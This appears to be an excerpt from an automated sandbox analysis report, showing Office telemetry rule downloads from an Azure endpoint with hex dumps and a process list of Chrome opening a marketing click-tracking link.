                          2024-11-25 16:56:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                          Session IDSource IPSource PortDestination IPDestination Port
                          59192.168.2.44981113.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:50 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:50 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:50 GMT
                          Content-Type: text/xml
                          Content-Length: 419
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                          ETag: "0x8DC582B9C710B28"
                          x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165650Z-174c587ffdfp4vpjhC1TEBybqw000000065g00000000mww9
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                          Session IDSource IPSource PortDestination IPDestination Port
                          60192.168.2.44981213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:50 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:50 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:50 GMT
                          Content-Type: text/xml
                          Content-Length: 477
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                          ETag: "0x8DC582BA54DCC28"
                          x-ms-request-id: 25a1d219-c01e-007a-1943-3cb877000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165650Z-178bfbc474bpnd5vhC1NYC4vr400000007p000000000pwz6
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:0
                          Start time:11:55:25
                          Start date:25/11/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:11:55:27
                          Start date:25/11/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1964,i,15332587490438412603,18326055542032576859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:3
                          Start time:11:55:31
                          Start date:25/11/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly